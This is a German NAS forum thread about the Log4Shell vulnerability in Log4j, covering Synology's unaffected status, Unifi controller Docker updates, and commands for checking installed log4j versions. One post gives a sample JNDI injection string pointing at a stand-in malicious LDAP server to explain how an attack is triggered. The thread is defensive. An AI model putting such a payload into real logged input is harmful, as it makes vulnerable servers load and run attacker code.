Schwerwiegende Log4Shell Sicherheitslücke in der Log4j Java Bibliothek - Synology ist nicht betroffen

Am 10.12.2021 ist eine sehr schwerwiegende Zero-Day-Sicherheitslücke mit dem Namen Log4Shell in der Java Bibliothek Log4j bekannt geworden. Die Sicherheitslücke ist deswegen so schwerwiegend weil sie sehr leicht auszunutzen ist und darüber beliebiger Code ausgeführt werden kann. Weiterhin ist die Log4j Bibliothek extrem weit verbreitet.

Es ist eine der schwersten Sicherheitslücken, die es je gab! Das BSI bewertet die Bedrohungslage mit rot, was nicht sehr häufig vorkommt.


Weitere Informationen zu der Lücke finden sich z.B. beim BSI und bei Heise:

https://www.bsi.bund.de/DE/Themen/U...fszielen/Webanwendungen/log4j/log4j_node.html

https://www.heise.de/news/Kritische...hrdet-zahlreiche-Server-und-Apps-6291653.html

Advisory:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Synology hat mitgeteilt, dass Synology Produkte von dieser Lücke nicht betroffen sind.

https://www.synology.com/en-global/security/advisory/Synology_SA_21_30

Da die Sicherheitslücke so weitreichend ist solltet ihr unbedingt eure komplette IT prüfen, ob andere Systeme betroffen sind.


Eine abschließende Liste, welche Geräte betroffen sind, gibt es nicht. Es gibt eine inoffizielle Liste eines Sicherheitsforschers, die eine erste Vorstellung gibt, was alles betroffen ist.

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
 

Fusion

Benutzer
Sehr erfahren
Mitglied seit
06. Apr 2013
Beiträge
13.087
Punkte für Reaktionen
589
Punkte
404
Natürlich sind da log4j Einträge, der container arbeitet schließlich mit dieser Logging Komponente vor und nach dem Update.
Die 6.5.54 arbeitet mit 2.15.0. Wird wohl die Tage irgendwann noch ein Update kommen, weil da noch nicht alle Lücken gefixt sind, erst in 2.16.0.

Dass du solche Einträge findest hat nichts damit zu tun ob du infiziert bis oder nicht.
Das zeigt nur an dass diese Softwarekomponente zum Einsatz kommt.
 

Huhie

Benutzer
Mitglied seit
29. Nov 2007
Beiträge
391
Punkte für Reaktionen
3
Punkte
18
Moin Zusammen,
vielen Dank für die schnelle Info! Dann werde ich mal den Unifi Controller neu aufsetzen. Die Frage ist, ob ich im Docker nun die 6.5.55 nehme oder
aber lieber noch die 6.0.45 und dann die manuellen Updates einspiele?

@DKeppi Hast Du eine deutsche Installationsanleitung für die manuellen Fixes?
 

geimist

Benutzer
Sehr erfahren
Mitglied seit
04. Jan 2012
Beiträge
4.003
Punkte für Reaktionen
352
Punkte
169
Ich wollte nur noch einmal nachfragen, ob ich alles richtig gemacht habe und das Verhalten meiner DS richtig ist, so wie ich es im Post #13 geschrieben haben?
Dafür habe ich dir ja ein thumbs up gegeben (y)
 

DKeppi

Benutzer
Mitglied seit
01. Apr 2011
Beiträge
3.126
Punkte für Reaktionen
23
Punkte
104

tproko

Benutzer
Mitglied seit
11. Jun 2017
Beiträge
1.744
Punkte für Reaktionen
182
Punkte
89
Irgendwie werden da Begriffe vermischt...

"Affected" heißt für mich, dass der Server betroffen ist / sein kann.
"Infiziert" ist ja was anderes, dass findet man mit dem grep/scan nach log4j nicht raus.

Im Endeffekt muss man mal rausfinden, ob man Software hat, die "betroffen" ist.
Wenn diese dann ins Internet durfte, dann kann es sein, dass man angegriffen wurde...
Kommt drauf an, ob das abgesichert war, wer da wo wie welche Log-Meldungen "einschleusen" konnte (manchmal reichte zB. ein Abruf via manipulierten User-Agent schon dafür) ... das kommt aber sehr auf die verwendete Software an.

Gerade bei diesen SmartHome Dingen oder Unify, wenn die Dinger nur im "LAN" waren, und keine Ports nach außen gegeben wurden, ja dann sollte man seine Software updaten. Aber wahrscheinlich sollte es wohl (hoffentlich) nichts schlimmes angerichtet haben, da nicht im Internet.

Wenn da irgendwas läuft, und das ist nach außen ins Internet verfügbar, ja, dann kann es sein, dass man Schadcode nachgeladen bekommen hat. Schwer zu beurteilen. Das muss sich jeder für sich ansehen, da sind viel zu viele ungeklärte Punkte, als da irgendwas zu verallgemeinern.
 

DKeppi

Benutzer
Mitglied seit
01. Apr 2011
Beiträge
3.126
Punkte für Reaktionen
23
Punkte
104

Anthracite

Benutzer
Mitglied seit
24. Apr 2021
Beiträge
7
Punkte für Reaktionen
0
Punkte
1
find / -iname "*log4j*"

Das dauert zwar etwas, aber nun habe ich Klarheit ..
Auf der sicheren Seite bist du damit nicht.

Wenn du ein Java-Programm hast, das als jar-Datei (Java Archive) gepackt ausgeliefert wird, und in der jar-Datei die kritische log4j-Bibliothek mit enthalten ist, dann findet sie dein find-Befehl nicht. Die Lücke ist aber da.

Auf der sicheren Seite bist du, wenn kein Java installiert ist.

Relativ sicher bist du auch, wenn dein NAS von außen nicht erreichbar ist (außer per VPN). Aber nicht ganz. Stell dir vor, du spielst Minecraft auf einem öffentlichen Server, und dein Minecraft-Programm loggt per log4j der Spieler, mit denen du chattest. Und dann schickt dir ein Spieler mit Namen "${jndi:ldap://boser.server.de/a}" eine Nachricht. Das war's dann. Gut, mit Minecraft ist das Spekulation, denn Minecraft ist zwar betroffen, aber der Server, und ich weiß nicht, ob das lokale Programm überhaupt so etwas loggt. Außerdem wirst du dein Syno-NAS nicht zum Minecraft-Spielen nehmen. Es wäre aber theoretisch denkbar, dass ein anderes Programm Daten, die von außerhalb kommen, loggt.

Ich denke mal, wenn man keine Services nach außen anbietet, d. h. das NAS nicht von außen erreichbar ist, kann man gut schlafen.
Updates der Programme und Pakete, die Java enthalten, sollte man aber machen.
 

AndiHeitzer

Benutzer
Sehr erfahren
Mitglied seit
30. Jun 2015
Beiträge
2.810
Punkte für Reaktionen
330
Punkte
129
Auf der sicheren Seite bist du damit nicht.
Ja, solange ich nur nach den Bibliotheken suche, hast Du vollkommen recht.

Um aber angreifbar zu sein braucht es natürlich mehr.
Zum Einen diese Bibliotheken und eine Software, die darauf zugreifen möchte/will/soll/kann/....

Nachdem ich also auf der DS kein JAVA drauf habe und auch keine Bibliothek im Filesystem habe, kann ich mich wieder zurücklehnen ...

Auf meiner WIN10-Kiste ist eine Bibliothek vorhanden, weil ich hier einen MSSQL-Server-Developer-Edition installiert habe.
Da muss ich mich noch bissel reinlesen.
 

tproko

Benutzer
Mitglied seit
11. Jun 2017
Beiträge
1.744
Punkte für Reaktionen
182
Punkte
89
Log4j 2.17.0 wurde released und fixed einen weiteren cve.

Das patchen und Updaten geht also weiter. Ist zwar kicht mehr ganz so krass, da zumindest wir die Patterns so nie verwendet haben, aber gehört natürlich trotzdem zeitnah wieder aktualisiert.
 

Anthracite

Benutzer
Mitglied seit
24. Apr 2021
Beiträge
7
Punkte für Reaktionen
0
Punkte
1
Das wird nicht der letzte Patch gewesen sein.

Seit der schweren Lücke von Anfang Dezember wird log4j so intensiv getestet und auf Sicherheit untersucht wie noch nie. Es ist damit zu rechnen, dass noch mehr Fehler gefunden werden.

Die letzte Lücke, weswegen 2.17 kam, ist jetzt nicht so gravierend. Ist die nicht behoben, kann ein Angreifer das Programm abschießen aber er kann weder Daten ändern noch abgreifen.
 

DKeppi

Benutzer
Mitglied seit
01. Apr 2011
Beiträge
3.126
Punkte für Reaktionen
23
Punkte
104
jacobalberty hat heute mal gepostet, wie man die log4j Version zB in seinem Unifi v6.0.45 Docker Image prüfen kann:

Code:
mkdir -p log4j-core-verify

cd log4j-core-verify

sudo docker pull jacobalberty/unifi:v6.0.45

sudo docker run -d --rm --name unifitest jacobalberty/unifi:v6.0.45

sudo docker cp unifitest:/usr/lib/unifi/lib/log4j-core-2.13.3.jar ./

unzip log4j-core-2.13.3.jar

grep Implementation-Version META-INF/MANIFEST.MF

sudo docker stop unifitest

cd ..

That should give you a bunch of output and at the very end second to last line spit out Implementation-Version: 2.17.0

That is the actual version of the log4j installed in the container.
 
NAS-Central - The Home of NAS

Kaffeautomat

Wenn du das Forum hilfreich findest oder uns unterstützen möchtest, dann gib uns doch einfach einen Kaffee aus.

Als Dankeschön schalten wir deinen Account werbefrei.

:coffee:

Hier gehts zum Kaffeeautomat